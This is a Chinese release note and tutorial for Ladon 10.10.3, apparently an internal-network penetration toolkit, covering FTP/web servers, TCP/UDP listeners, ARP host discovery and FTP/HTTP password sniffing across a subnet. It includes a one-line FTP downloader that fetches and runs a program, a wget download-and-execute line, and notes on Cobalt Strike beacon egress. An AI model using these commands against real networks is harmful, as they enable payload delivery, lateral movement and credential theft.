Ladon 10.10.3 20230410

[+]FtpServer    迷你FTP服务器，(支持windows/Linux自带ftp命令实现文件上传下载)                 默认21 admin admin 可自定义端口  自定义用户、密码[+]TcpServer    监听TCP发包数据 保存TXT和HEX 如SMB RDP HTTP SSH LDAP FTP等协议 [+]UdpServer    监听UDP发包数据 保存TXT和HEX 如DNS、SNMP等协议[+]ArpInfo        ARP协议探测存活主机IP和MAC，仅支持同一子网[u]WebServer    迷你WEB服务器[u]PortScan        移除9100端口

新增TCP、UDP监听服务器，用于捕获一些POC工具发包数据，由于没有模拟相关协议，无任何回复，需要握手成功才发包的协议可能就无法捕获POC数据，这种类型，老老实实使用WireShark抓包分析。

0x001 ARP协议探测存活主机IP、MAC地址

Ladon 192.168.1.18/c ArpInfo

更多协议，请使用InfoScan一键探测，使用该模块可全方位探测可达网段、出网协议、以及存活主机、设备、服务器、邮件系统、路由器等信息

0x002 TCP监听发包数据，如CS上线心跳包

Ladon TCP 800

0x003 UDP监听发包数据，如SNMP协议

Ladon UDP 161

0x004 迷你FTP服务器

Ladon FTP 21Ladon FTP 21 admin k8gege520

支持windows\linux系统自带FTP命令，支持文件上传、下载

图片演示使用windows系统连接列目录，实战自行将ftp转成一条命令，实现一键上传下载文件，当然下载也可以使用Ladon的web服务器，curl等命令比ftp更简单。

一行代码FTP下载者

echo open 127.0.0.1 >k&&echo admin>>k&&echo admin>>k&&echo binary >>k&&echo lcd c:\windows\temp>>k&&echo get a.dat >>k&&echo bye >>k&&ftp -s:k&&c:\windows\temp\a.dat&&del k /q /f&&del c:\windows\temp\a.dat&&exit

迷你FTP服务器的根目录在C:\users\public目录，所以我们复制calc.exe改名为a.dat到根目录，使用以上命令下载a.dat并执行，实战替成成任意程序。

内网中上传文件也是一样，大家自行改成一行命令

0x005  迷你Web服务器

Ladon web 800Laodn WebServer 800

下载执行

wget http://192.168.1.8/m.lnx;m.lnx

0x006  嗅探FTP密码

Ladon FtpSniffer 192.168.50.145

使用时填写被控机器IP，Ladon自动嗅探本机C段所有机器FTP用户密码，如下图演示，本机为50.145，无论是从50.85访问50.145，还是从本机自己访问自己，都能捕获到FTP登陆的用户和密码。实战中，如果管理员从50.200访问外网FTP服务器或者访问跨网段FTP服务器，也能捕获到外网FTP用户密码。因为捕获的是整个C段的FTP流量，向外发现，或者其它人访问C段机器。

注意若是C段没有主动访问跨访问机器FTP，或跨网段机器也不访问C段机器，就嗅探不到数据。简单一点就是你在192.168.50.145上启动FTP嗅探，嗅不到192.168.8.10访问192.168.8.99的FTP服务器密码，因为只能嗅探经过50网段机器的FTP信息，还有一种情况，管理员不访问FTP服务器，就算在C段里面也嗅不到FTP密码，所以也不是无脑使用FTP嗅探。

0x007  嗅探HTTP密码

用法与FTP嗅探一致，绑定本机IP，自动嗅探整个C段，使用HTTP协议传输的用户和密码，才能截取，使用HTTPS登陆的网站就无法嗅探到用户密码。HTTPS和HTTP的区别，主要是在HTTP基础上启用加密。

针对浏览器我们可以读取本机保存的相关站点用户密码，但不保存的密码无法读取，没有C段其它机器权限，也无法读取没有权限机器的密码，但通过嗅探，有可能获取到整个C段里其它机器的用户和密码。所以嗅探和读取没有谁能代替谁，实战根据情况，可能两者都用到。

科普：网络层协议都有哪些?传输层协议都有哪些?

1. TCP协议:传输控制协议,提供可靠的、面向连接的数据传输服务。

2. UDP协议:用户数据报协议,提供不可靠的、无连接的数据传输服务。

3. SCTP协议:流控制传输协议,提供可靠的、面向连接的数据传输服务,并支持多流传输。

4. DCCP协议:数据报拥塞控制协议,提供不可靠的、面向连接的数据传输服务,并支持拥塞控制。

TCP服务器监听命令

Ladon TCP 8080Ladon TcpServer 8080

当然Ladon也有专门的WEB服务器，为了安全默认不允许列目录，加上dir我们可以列目录(没有dir没有首页，默认强制显示404，迷惑他人)，方便本地搭环境时，上传下载到另一个虚拟机，如vmtools抽风没安装好时，当然内网渗透，需要传文件到目标也是同理。

迷你WEB服务器启动命令

Ladon Web 8080 dirLadon Web 800Ladon WebServer 80

有些人可能会问为什么HTTP协议基于TCP协议实现，实战时却经常遇到HTTP协议可出网，但TCP协议不可出网的机器？http能出网，TCP不应该也能出网吗？怎么说呢，富人也是人，他能买得起的东西，因为贵，不代表是个人就能买得起。都是TCP协议，目标防火墙做了策略只允许http协议出网，SMB或其它基于TCP协议的自然不允许出网，因为不同协议，协议头不一样，就是TCP发的数据包不一样。打个比方，就像某楼盘，看房资格是存款1000万，什么老板、老总和某个富人一样都是老板或老总，但是一查存款没有1000万， 就相当于不是http协议，自然就不让你看房了啊，不是说你是老总就一定是富人，也让你进场。小楼盘可能是个人都让你去看启，你身上有10元、1万还是100万，都让你进门。1000万很多人没有看房资格，白名单只允许HTTP，那非HTTP数据包的协议当然不能通过啊。

TCP协议能上线，HTTP协议就一定能上线吗？

大部份情况下，TCP能上线的机器，HTTP/S协议也能上线。就像穷人能买得起的东西，富人也随便买得起是一样的，TCP是底层协议，HTTP是应用层协议，基于TCP协议的应用，简单理解为富人利用穷人给他赚钱。但也有一种情况，防火墙限制HTTP协议，比如仇富之人，只把东西卖给穷人，据我10几年生涯来看，TCP能出网，HTTP协议被封的概率极低，印象中还没见过。实战真遇到这种情况，你连TCP协议都能出网，谁还用HTTP协议。随意用一个TCP协议都比HTTP操作流畅、高效、稳定很多倍，你觉得管理员蠢到关个狗洞，然后给你打开大门和其它窗口，让小偷随意进出？只禁一个协议，和只允许一个协议是不一样的，就像只禁止有10万存款的人看房，那有5万、5元、100万、80元等人都可以随便看，很明显这样的黑名单并不合理，所以实际上根本不会限制10万元的人看房。所以目标TCP协议能上线的，HTTP基本上都能上线，要是不能上线，就是M被针对了，所发数据包被拦，或M本身有问题。验证HTTP是否能出网非常简单，使用http协议访问正常网站，如百度、google，能正常访问到就代表http协议可出网。而不是拿一个有问题的M来衡量目标HTTP协议是否可用。

同理，我们也可以监听SMB数据，如Ladon探测MS17010所发的数据包

Ladon TCP 445Ladon TcpServer 445

ps: 监听445需关闭系统445服务，445占用，无法监听

UDP协议数据包监听，如SNMP探测，我们可监听到默认public团体名称

UDP服务器监听命令

Ladon UDP 161Ladon UdpServer 8080

本文所演示的命令，CS插件也支持，在Beacon命令行下Ladon用法与本文一致，如在CS上控的机器一键开启FTP服务器，然后通过命令行，将其它机器文件上传到跳板机。同理也可以在机器上监听特定端口，捕获其它人的payload,如本文演示的监听捕获MS17010漏洞检测POC，SNMP协议探测系统信息等，所以大家至少要了解相关协议、端口。

不熟悉Ladon命令的，可以使用Ladon Study一键使用，可当作学习模式。勾选复制命令，点击按钮就会执行对应功能，并在后台复制对应Ladon命令，可直接在CMD粘贴使用。对于监听模块，监听端口可写在目标文本框中。